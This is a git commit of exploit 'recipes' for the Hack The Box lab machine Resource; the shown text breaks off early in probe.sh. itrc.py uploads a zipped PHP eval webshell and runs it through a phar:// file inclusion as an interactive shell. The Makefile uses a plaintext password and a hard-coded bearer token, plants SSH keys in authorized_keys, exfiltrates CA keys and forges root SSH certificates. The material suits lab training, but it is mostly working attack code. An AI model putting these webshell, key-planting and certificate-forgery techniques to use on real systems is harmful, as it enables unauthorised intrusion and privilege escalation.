htb-season-6-resource

commit c59912bc322f02e1dbc9e6f39df0e32032366075
Author: y5c4l3 <y5c4l3@proton.me>
Date:   Thu, 29 Aug 2024 07:51:18 +0800

initial commit

Signed-off-by: y5c4l3 <y5c4l3@proton.me>

Diffstat:
A
.gitignore
 | 
0

A
.hosts
 | 
1
+
A
LICENSE
 | 
21
+++++++++++++++++++++
A
Makefile
 | 
84
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A
README.md
 | 
21
+++++++++++++++++++++
A
itrc.py
 | 
93
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A
poetry.lock
 | 
165
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A
probe.sh
 | 
143
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
A
pyproject.toml
 | 
18
++++++++++++++++++
A
ssh_config
 | 
17
+++++++++++++++++

10 files changed, 563 insertions(+), 0 deletions(-)
diff --git a/.gitignore b/.gitignore
diff --git a/.hosts b/.hosts
@@ -0,0 +1 @@
+10.10.11.27 itrc.ssg.htb signserv.ssg.htb
diff --git a/LICENSE b/LICENSE
@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2024 y5c4l3
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
diff --git a/Makefile b/Makefile
@@ -0,0 +1,84 @@
+SELF := ./keys/id_self
+OLDCA := ./itrc/ca-itrc
+SSGCA := ./ssg/ca-it
+
+ATTACHMENTS := ./itrc/itrc.ssg.htb.har \
+               ./itrc/id_bmcgregor.pub \
+               ./itrc/id_mgraham.pub
+
+.PHONY: clean webshell mitrc oldcasign remotesign ssgcasign
+
+all: key
+
+webshell:
+	python3 itrc.py
+
+key: $(SELF)
+$(SELF):
+	ssh-keygen -t ed25519 -q -N '' -C 'recipe@y5' -f "$@"
+
+attachments: $(ATTACHMENTS)
+
+itrc/itrc.ssg.htb.har: itrc/c2f4813259cc57fab36b311c5058cf031cb6eb51.zip
+	unzip $< -d ./itrc
+	touch $@
+itrc/id_bmcgregor.pub: itrc/eb65074fe37671509f24d1652a44944be61e4360.zip
+	unzip $< -d ./itrc
+	mv ./itrc/id_ed25519.pub $@
+	touch $@
+itrc/id_mgraham.pub: itrc/e8c6575573384aeeab4d093cc99c7e5927614185.zip
+	unzip $< -d ./itrc
+	mv ./itrc/id_rsa.pub $@
+	touch $@
+
+itrc/%.zip:
+	wget -O "$@" http://itrc.ssg.htb/uploads/$(shell basename "$@")
+
+mitrcauth: key
+	echo 82yards2closeit
+	ssh msainristil@itrc.ssg.htb 'mkdir -p .ssh; echo $(shell cat $(SELF).pub) >> .ssh/authorized_keys'
+
+oldca: $(OLDCA) $(OLDCA).pub
+itrc/ca-%:
+	scp -F ssh_config mitrc:~/decommission_old_ca/$(shell basename "$@") ./itrc
+
+oldcasign: key oldca
+	ssh-keygen \
+		-s ./$(OLDCA) \
+		-I root@ssg.htb \
+		-n zzinter,msainristil,root \
+		-z 10086 \
+		-V -365d:+365d \
+		$(SELF)
+	mv $(SELF)-cert.pub $(SELF)-itrc.pub
+
+REMOTE_PRINCIPALS := webserver,analytics,support,security,zzinter_temp
+remotesign: $(SELF)-remote.pub
+$(SELF)-remote.pub: $(SELF)
+	curl http://signserv.ssg.htb/v1/sign \
+		-d '{"pubkey": "'"$(shell cat $(SELF).pub)"'", "username": "'"root@ssg.htb"'", "principals": "'"$(REMOTE_PRINCIPALS)"'"}' \
+		-H "Content-Type: application/json" \
+		-H "Authorization:Bearer 7Tqx6owMLtnt6oeR2ORbWmOPk30z4ZH901kH6UUT6vNziNqGrYgmSve5jCmnPJDE" \
+		-o $(SELF)-remote.pub
+
+ssgcaprobe: $(SSGCA) $(SSGCA).pub
+$(SSGCA).pub:
+	scp -F ssh_config support@ssg:/etc/ssh/ca-it.pub $@
+$(SSGCA): probe.sh
+	cat probe.sh | ssh -F ssh_config zzinter@ssg 'sh' > $@
+	echo >> $@
+	chmod 600 $@
+
+ssgcasign: ssgcaprobe
+	ssh-keygen \
+		-s $(SSGCA) \
+		-I root@ssg.htb \
+		-n webserver,analytics,support,security,zzinter_temp,root_user \
+		-z 10086 \
+		-V -365d:+365d \
+		$(SELF)
+	mv $(SELF)-cert.pub $(SELF)-ssg.pub
+
+clean:
+	rm $(SELF)
+
diff --git a/README.md b/README.md
@@ -0,0 +1,21 @@
+# htb-season-6-resource
+
+Recipes for HTB Season 6 [Resource](https://app.hackthebox.com/machines/619)
+
+## Dependencies
+
+```
+poetry install
+make key
+```
+
+## Recipes
+
+* `make attachments`: Download sensitive attachments
+* `make webshell`: Enter interactive webshell
+* `make mitrcauth`: Add public key to `msainristil`'s authorized keys
+* `make oldca`: Transfer old CA to local
+* `make oldcasign`: Sign ITRC certificates that can be authenticated as anyone
+* `make remotesign`: Sign SSG certificates (non-root) using online API
+* `make ssgcaprobe`: Probe new SSG CA via Bash glob pattern matching
+* `make ssgcasign`: Sign SSG certificates using probed CA (full principal list)
diff --git a/itrc.py b/itrc.py
@@ -0,0 +1,93 @@
+import io
+import requests
+import zipfile
+import re
+import readline
+
+from urllib.parse import urljoin
+
+class Exploit:
+    def __init__(self, base):
+        self.base = base
+        self.session = requests.Session()
+        self.session.headers = {
+            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0',
+        }
+    def session():
+        return self.session
+    def prepare(self):
+        self.session.post(f'{self.base}/api/register.php', data={
+            'user': 'yyy555',
+            'pass': 'yyy555',
+            'pass2': 'yyy555',
+        })
+        self.session.post(f'{self.base}/api/login.php', data={
+            'user': 'yyy555',
+            'pass': 'yyy555',
+        })
+    def upload(self, content) -> str:
+        res = self.session.post(f'{self.base}/api/create_ticket.php',
+            data={
+                'subject': 'exploit',
+                'body': 'exploit',
+            },
+            files={
+                'attachment': ('attachment.zip', content, 'application/zip'),
+            },
+        )
+
+        res = self.session.get(f'{self.base}')
+
+        PATTERN_TICKET = re.compile(r'id=(\d+)')
+        *_, last = re.finditer(PATTERN_TICKET, res.text)
+        ticket_id = last.group(1)
+
+        res = self.session.get(f'{self.base}/', params={
+            'page': 'ticket',
+            'id': ticket_id,
+        })
+
+        PATTERN_HREF = re.compile(r'uploads/(.*?\.zip)')
+        result = re.search(PATTERN_HREF, res.text).group(0)
+
+        return result
+    def include(self, path, method, **kwargs):
+        res = self.session.request(method, f'{self.base}/?page={path}', **kwargs)
+        return res
+
+payload = io.BytesIO()
+shell = b'''
+<?php
+    if (md5($_GET['p'] ?? '') !== 'b90f3171a899adc93d54a5e53bb8a13d')
+    {
+        die(1);
+    }
+    @error_reporting(E_ALL);
+    @ini_set('display_errors', 'on');
+    echo '<output>';
+    eval(file_get_contents('php://input') . ($_GET['c'] ?? ''));
+    echo '</output>';
+?>
+'''
+OUTPUT_PATTERN = re.compile(r'<output>(.*?)</output>', re.MULTILINE | re.DOTALL)
+with zipfile.ZipFile(payload, 'w', compression=zipfile.ZIP_DEFLATED, allowZip64=False) as z:
+    z.writestr('shell.php', shell)
+
+exp = Exploit('http://itrc.ssg.htb')
+exp.prepare()
+path = exp.upload(payload.getvalue())
+print(f'Uploaded at {path}')
+
+path = f'phar://{path}/shell'
+
+readline.parse_and_bind('"\\e[A": history-search-backward')
+readline.parse_and_bind('"\\e[B": history-search-forward')
+while True:
+    line = input('> ')
+    try:
+        res = exp.include(path, 'POST', params={'p': 'yyy555'}, data=line)
+        result = re.findall(OUTPUT_PATTERN, res.text)[0]
+        print(result.strip())
+    except Exception as e:
+        print('Failed to execute')
+        print(e)
diff --git a/poetry.lock b/poetry.lock
@@ -0,0 +1,165 @@
+# This file is automatically @generated by Poetry 1.8.3 and should not be changed by hand.
+
+[[package]]
+name = "certifi"
+version = "2024.7.4"
+description = "Python package for providing Mozilla's CA Bundle."
+optional = false
+python-versions = ">=3.6"
+files = [
+    {file = "certifi-2024.7.4-py3-none-any.whl", hash = "sha256:c198e21b1289c2ab85ee4e67bb4b4ef3ead0892059901a8d5b622f24a1101e90"},
+    {file = "certifi-2024.7.4.tar.gz", hash = "sha256:5a1e7645bc0ec61a09e26c36f6106dd4cf40c6db3a1fb6352b0244e7fb057c7b"},
+]
+
+[[package]]
+name = "charset-normalizer"
+version = "3.3.2"
+description = "The Real First Universal Charset Detector. Open, modern and actively maintained alternative to Chardet."
+optional = false
+python-versions = ">=3.7.0"
+files = [
+    {file = "charset-normalizer-3.3.2.tar.gz", hash = "sha256:f30c3cb33b24454a82faecaf01b19c18562b1e89558fb6c56de4d9118a032fd5"},
+    {file = "charset_normalizer-3.3.2-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:25baf083bf6f6b341f4121c2f3c548875ee6f5339300e08be3f2b2ba1721cdd3"},
+    {file = "charset_normalizer-3.3.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:06435b539f889b1f6f4ac1758871aae42dc3a8c0e24ac9e60c2384973ad73027"},
+    {file = "charset_normalizer-3.3.2-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:9063e24fdb1e498ab71cb7419e24622516c4a04476b17a2dab57e8baa30d6e03"},
+    {file = "charset_normalizer-3.3.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6897af51655e3691ff853668779c7bad41579facacf5fd7253b0133308cf000d"},
+    {file = "charset_normalizer-3.3.2-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1d3193f4a680c64b4b6a9115943538edb896edc190f0b222e73761716519268e"},
+    {file = "charset_normalizer-3.3.2-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:cd70574b12bb8a4d2aaa0094515df2463cb429d8536cfb6c7ce983246983e5a6"},
+    {file = "charset_normalizer-3.3.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8465322196c8b4d7ab6d1e049e4c5cb460d0394da4a27d23cc242fbf0034b6b5"},
+    {file = "charset_normalizer-3.3.2-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:a9a8e9031d613fd2009c182b69c7b2c1ef8239a0efb1df3f7c8da66d5dd3d537"},
+    {file = "charset_normalizer-3.3.2-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:beb58fe5cdb101e3a055192ac291b7a21e3b7ef4f67fa1d74e331a7f2124341c"},
+    {file = "charset_normalizer-3.3.2-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:e06ed3eb3218bc64786f7db41917d4e686cc4856944f53d5bdf83a6884432e12"},
+    {file = "charset_normalizer-3.3.2-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:2e81c7b9c8979ce92ed306c249d46894776a909505d8f5a4ba55b14206e3222f"},
+    {file = "charset_normalizer-3.3.2-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:572c3763a264ba47b3cf708a44ce965d98555f618ca42c926a9c1616d8f34269"},
+    {file = "charset_normalizer-3.3.2-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:fd1abc0d89e30cc4e02e4064dc67fcc51bd941eb395c502aac3ec19fab46b519"},
+    {file = "charset_normalizer-3.3.2-cp310-cp310-win32.whl", hash = "sha256:3d47fa203a7bd9c5b6cee4736ee84ca03b8ef23193c0d1ca99b5089f72645c73"},
+    {file = "charset_normalizer-3.3.2-cp310-cp310-win_amd64.whl", hash = "sha256:10955842570876604d404661fbccbc9c7e684caf432c09c715ec38fbae45ae09"},
+    {file = "charset_normalizer-3.3.2-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:802fe99cca7457642125a8a88a084cef28ff0cf9407060f7b93dca5aa25480db"},
+    {file = "charset_normalizer-3.3.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:573f6eac48f4769d667c4442081b1794f52919e7edada77495aaed9236d13a96"},
+    {file = "charset_normalizer-3.3.2-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:549a3a73da901d5bc3ce8d24e0600d1fa85524c10287f6004fbab87672bf3e1e"},
+    {file = "charset_normalizer-3.3.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f27273b60488abe721a075bcca6d7f3964f9f6f067c8c4c605743023d7d3944f"},
+    {file = "charset_normalizer-3.3.2-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1ceae2f17a9c33cb48e3263960dc5fc8005351ee19db217e9b1bb15d28c02574"},
+    {file = "charset_normalizer-3.3.2-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:65f6f63034100ead094b8744b3b97965785388f308a64cf8d7c34f2f2e5be0c4"},
+    {file = "charset_normalizer-3.3.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:753f10e867343b4511128c6ed8c82f7bec3bd026875576dfd88483c5c73b2fd8"},
+    {file = "charset_normalizer-3.3.2-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:4a78b2b446bd7c934f5dcedc588903fb2f5eec172f3d29e52a9096a43722adfc"},
+    {file = "charset_normalizer-3.3.2-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:e537484df0d8f426ce2afb2d0f8e1c3d0b114b83f8850e5f2fbea0e797bd82ae"},
+    {file = "charset_normalizer-3.3.2-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:eb6904c354526e758fda7167b33005998fb68c46fbc10e013ca97f21ca5c8887"},
+    {file = "charset_normalizer-3.3.2-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:deb6be0ac38ece9ba87dea880e438f25ca3eddfac8b002a2ec3d9183a454e8ae"},
+    {file = "charset_normalizer-3.3.2-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:4ab2fe47fae9e0f9dee8c04187ce5d09f48eabe611be8259444906793ab7cbce"},
+    {file = "charset_normalizer-3.3.2-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:80402cd6ee291dcb72644d6eac93785fe2c8b9cb30893c1af5b8fdd753b9d40f"},
+    {file = "charset_normalizer-3.3.2-cp311-cp311-win32.whl", hash = "sha256:7cd13a2e3ddeed6913a65e66e94b51d80a041145a026c27e6bb76c31a853c6ab"},
+    {file = "charset_normalizer-3.3.2-cp311-cp311-win_amd64.whl", hash = "sha256:663946639d296df6a2bb2aa51b60a2454ca1cb29835324c640dafb5ff2131a77"},
+    {file = "charset_normalizer-3.3.2-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:0b2b64d2bb6d3fb9112bafa732def486049e63de9618b5843bcdd081d8144cd8"},
+    {file = "charset_normalizer-3.3.2-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:ddbb2551d7e0102e7252db79ba445cdab71b26640817ab1e3e3648dad515003b"},
+    {file = "charset_normalizer-3.3.2-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:55086ee1064215781fff39a1af09518bc9255b50d6333f2e4c74ca09fac6a8f6"},
+    {file = "charset_normalizer-3.3.2-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8f4a014bc36d3c57402e2977dada34f9c12300af536839dc38c0beab8878f38a"},
+    {file = "charset_normalizer-3.3.2-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:a10af20b82360ab00827f916a6058451b723b4e65030c5a18577c8b2de5b3389"},
+    {file = "charset_normalizer-3.3.2-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:8d756e44e94489e49571086ef83b2bb8ce311e730092d2c34ca8f7d925cb20aa"},
+    {file = "charset_normalizer-3.3.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:90d558489962fd4918143277a773316e56c72da56ec7aa3dc3dbbe20fdfed15b"},
+    {file = "charset_normalizer-3.3.2-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6ac7ffc7ad6d040517be39eb591cac5ff87416c2537df6ba3cba3bae290c0fed"},
+    {file = "charset_normalizer-3.3.2-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:7ed9e526742851e8d5cc9e6cf41427dfc6068d4f5a3bb03659444b4cabf6bc26"},
+    {file = "charset_normalizer-3.3.2-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:8bdb58ff7ba23002a4c5808d608e4e6c687175724f54a5dade5fa8c67b604e4d"},
+    {file = "charset_normalizer-3.3.2-cp312-cp312-musllinux_1_1_ppc64le.whl", hash = "sha256:6b3251890fff30ee142c44144871185dbe13b11bab478a88887a639655be1068"},
+    {file = "charset_normalizer-3.3.2-cp312-cp312-musllinux_1_1_s390x.whl", hash = "sha256:b4a23f61ce87adf89be746c8a8974fe1c823c891d8f86eb218bb957c924bb143"},
+    {file = "charset_normalizer-3.3.2-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:efcb3f6676480691518c177e3b465bcddf57cea040302f9f4e6e191af91174d4"},
+    {file = "charset_normalizer-3.3.2-cp312-cp312-win32.whl", hash = "sha256:d965bba47ddeec8cd560687584e88cf699fd28f192ceb452d1d7ee807c5597b7"},
+    {file = "charset_normalizer-3.3.2-cp312-cp312-win_amd64.whl", hash = "sha256:96b02a3dc4381e5494fad39be677abcb5e6634bf7b4fa83a6dd3112607547001"},
+    {file = "charset_normalizer-3.3.2-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:95f2a5796329323b8f0512e09dbb7a1860c46a39da62ecb2324f116fa8fdc85c"},
+    {file = "charset_normalizer-3.3.2-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c002b4ffc0be611f0d9da932eb0f704fe2602a9a949d1f738e4c34c75b0863d5"},
+    {file = "charset_normalizer-3.3.2-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:a981a536974bbc7a512cf44ed14938cf01030a99e9b3a06dd59578882f06f985"},
+    {file = "charset_normalizer-3.3.2-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:3287761bc4ee9e33561a7e058c72ac0938c4f57fe49a09eae428fd88aafe7bb6"},
+    {file = "charset_normalizer-3.3.2-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:42cb296636fcc8b0644486d15c12376cb9fa75443e00fb25de0b8602e64c1714"},
+    {file = "charset_normalizer-3.3.2-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0a55554a2fa0d408816b3b5cedf0045f4b8e1a6065aec45849de2d6f3f8e9786"},
+    {file = "charset_normalizer-3.3.2-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:c083af607d2515612056a31f0a8d9e0fcb5876b7bfc0abad3ecd275bc4ebc2d5"},
+    {file = "charset_normalizer-3.3.2-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:87d1351268731db79e0f8e745d92493ee2841c974128ef629dc518b937d9194c"},
+    {file = "charset_normalizer-3.3.2-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:bd8f7df7d12c2db9fab40bdd87a7c09b1530128315d047a086fa3ae3435cb3a8"},
+    {file = "charset_normalizer-3.3.2-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:c180f51afb394e165eafe4ac2936a14bee3eb10debc9d9e4db8958fe36afe711"},
+    {file = "charset_normalizer-3.3.2-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:8c622a5fe39a48f78944a87d4fb8a53ee07344641b0562c540d840748571b811"},
+    {file = "charset_normalizer-3.3.2-cp37-cp37m-win32.whl", hash = "sha256:db364eca23f876da6f9e16c9da0df51aa4f104a972735574842618b8c6d999d4"},
+    {file = "charset_normalizer-3.3.2-cp37-cp37m-win_amd64.whl", hash = "sha256:86216b5cee4b06df986d214f664305142d9c76df9b6512be2738aa72a2048f99"},
+    {file = "charset_normalizer-3.3.2-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:6463effa3186ea09411d50efc7d85360b38d5f09b870c48e4600f63af490e56a"},
+    {file = "charset_normalizer-3.3.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:6c4caeef8fa63d06bd437cd4bdcf3ffefe6738fb1b25951440d80dc7df8c03ac"},
+    {file = "charset_normalizer-3.3.2-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:37e55c8e51c236f95b033f6fb391d7d7970ba5fe7ff453dad675e88cf303377a"},
+    {file = "charset_normalizer-3.3.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fb69256e180cb6c8a894fee62b3afebae785babc1ee98b81cdf68bbca1987f33"},
+    {file = "charset_normalizer-3.3.2-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ae5f4161f18c61806f411a13b0310bea87f987c7d2ecdbdaad0e94eb2e404238"},
+    {file = "charset_normalizer-3.3.2-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:b2b0a0c0517616b6869869f8c581d4eb2dd83a4d79e0ebcb7d373ef9956aeb0a"},
+    {file = "charset_normalizer-3.3.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:45485e01ff4d3630ec0d9617310448a8702f70e9c01906b0d0118bdf9d124cf2"},
+    {file = "charset_normalizer-3.3.2-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:eb00ed941194665c332bf8e078baf037d6c35d7c4f3102ea2d4f16ca94a26dc8"},
+    {file = "charset_normalizer-3.3.2-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:2127566c664442652f024c837091890cb1942c30937add288223dc895793f898"},
+    {file = "charset_normalizer-3.3.2-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:a50aebfa173e157099939b17f18600f72f84eed3049e743b68ad15bd69b6bf99"},
+    {file = "charset_normalizer-3.3.2-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:4d0d1650369165a14e14e1e47b372cfcb31d6ab44e6e33cb2d4e57265290044d"},
+    {file = "charset_normalizer-3.3.2-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:923c0c831b7cfcb071580d3f46c4baf50f174be571576556269530f4bbd79d04"},
+    {file = "charset_normalizer-3.3.2-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:06a81e93cd441c56a9b65d8e1d043daeb97a3d0856d177d5c90ba85acb3db087"},
+    {file = "charset_normalizer-3.3.2-cp38-cp38-win32.whl", hash = "sha256:6ef1d82a3af9d3eecdba2321dc1b3c238245d890843e040e41e470ffa64c3e25"},
+    {file = "charset_normalizer-3.3.2-cp38-cp38-win_amd64.whl", hash = "sha256:eb8821e09e916165e160797a6c17edda0679379a4be5c716c260e836e122f54b"},
+    {file = "charset_normalizer-3.3.2-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:c235ebd9baae02f1b77bcea61bce332cb4331dc3617d254df3323aa01ab47bd4"},
+    {file = "charset_normalizer-3.3.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:5b4c145409bef602a690e7cfad0a15a55c13320ff7a3ad7ca59c13bb8ba4d45d"},
+    {file = "charset_normalizer-3.3.2-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:68d1f8a9e9e37c1223b656399be5d6b448dea850bed7d0f87a8311f1ff3dabb0"},
+    {file = "charset_normalizer-3.3.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:22afcb9f253dac0696b5a4be4a1c0f8762f8239e21b99680099abd9b2b1b2269"},
+    {file = "charset_normalizer-3.3.2-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:e27ad930a842b4c5eb8ac0016b0a54f5aebbe679340c26101df33424142c143c"},
+    {file = "charset_normalizer-3.3.2-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:1f79682fbe303db92bc2b1136016a38a42e835d932bab5b3b1bfcfbf0640e519"},
+    {file = "charset_normalizer-3.3.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b261ccdec7821281dade748d088bb6e9b69e6d15b30652b74cbbac25e280b796"},
+    {file = "charset_normalizer-3.3.2-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:122c7fa62b130ed55f8f285bfd56d5f4b4a5b503609d181f9ad85e55c89f4185"},
+    {file = "charset_normalizer-3.3.2-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:d0eccceffcb53201b5bfebb52600a5fb483a20b61da9dbc885f8b103cbe7598c"},
+    {file = "charset_normalizer-3.3.2-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:9f96df6923e21816da7e0ad3fd47dd8f94b2a5ce594e00677c0013018b813458"},
+    {file = "charset_normalizer-3.3.2-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:7f04c839ed0b6b98b1a7501a002144b76c18fb1c1850c8b98d458ac269e26ed2"},
+    {file = "charset_normalizer-3.3.2-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:34d1c8da1e78d2e001f363791c98a272bb734000fcef47a491c1e3b0505657a8"},
+    {file = "charset_normalizer-3.3.2-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:ff8fa367d09b717b2a17a052544193ad76cd49979c805768879cb63d9ca50561"},
+    {file = "charset_normalizer-3.3.2-cp39-cp39-win32.whl", hash = "sha256:aed38f6e4fb3f5d6bf81bfa990a07806be9d83cf7bacef998ab1a9bd660a581f"},
+    {file = "charset_normalizer-3.3.2-cp39-cp39-win_amd64.whl", hash = "sha256:b01b88d45a6fcb69667cd6d2f7a9aeb4bf53760d7fc536bf679ec94fe9f3ff3d"},
+    {file = "charset_normalizer-3.3.2-py3-none-any.whl", hash = "sha256:3e4d1f6587322d2788836a99c69062fbb091331ec940e02d12d179c1d53e25fc"},
+]
+
+[[package]]
+name = "idna"
+version = "3.8"
+description = "Internationalized Domain Names in Applications (IDNA)"
+optional = false
+python-versions = ">=3.6"
+files = [
+    {file = "idna-3.8-py3-none-any.whl", hash = "sha256:050b4e5baadcd44d760cedbd2b8e639f2ff89bbc7a5730fcc662954303377aac"},
+    {file = "idna-3.8.tar.gz", hash = "sha256:d838c2c0ed6fced7693d5e8ab8e734d5f8fda53a039c0164afb0b82e771e3603"},
+]
+
+[[package]]
+name = "requests"
+version = "2.32.3"
+description = "Python HTTP for Humans."
+optional = false
+python-versions = ">=3.8"
+files = [
+    {file = "requests-2.32.3-py3-none-any.whl", hash = "sha256:70761cfe03c773ceb22aa2f671b4757976145175cdfca038c02654d061d6dcc6"},
+    {file = "requests-2.32.3.tar.gz", hash = "sha256:55365417734eb18255590a9ff9eb97e9e1da868d4ccd6402399eaf68af20a760"},
+]
+
+[package.dependencies]
+certifi = ">=2017.4.17"
+charset-normalizer = ">=2,<4"
+idna = ">=2.5,<4"
+urllib3 = ">=1.21.1,<3"
+
+[package.extras]
+socks = ["PySocks (>=1.5.6,!=1.5.7)"]
+use-chardet-on-py3 = ["chardet (>=3.0.2,<6)"]
+
+[[package]]
+name = "urllib3"
+version = "2.2.2"
+description = "HTTP library with thread-safe connection pooling, file post, and more."
+optional = false
+python-versions = ">=3.8"
+files = [
+    {file = "urllib3-2.2.2-py3-none-any.whl", hash = "sha256:a448b2f64d686155468037e1ace9f2d2199776e17f0a46610480d311f73e3472"},
+    {file = "urllib3-2.2.2.tar.gz", hash = "sha256:dd505485549a7a552833da5e6063639d0d177c04f23bc3864e41e5dc5f612168"},
+]
+
+[package.extras]
+brotli = ["brotli (>=1.0.9)", "brotlicffi (>=0.8.0)"]
+h2 = ["h2 (>=4,<5)"]
+socks = ["pysocks (>=1.5.6,!=1.5.7,<2.0)"]
+zstd = ["zstandard (>=0.18.0)"]
+
+[metadata]
+lock-version = "2.0"
+python-versions = "^3.10"
+content-hash = "9fe327963e7285423f56ab83ddc9a37c4cd3681f23cee6ecc62f03807959d902"
diff --git a/probe.sh b/probe.sh
@@ -0,0 +1,143 @@
+#!/bin/sh
+
+sch_sarray_is_empty() {
+  sarray=$1
+  [ -z "$sarray" ]
+}
+
+sch_sarray_len() {
+  sarray=$1
+  i=0
+  for element in $sarray; do
+    i=$((i + 1))
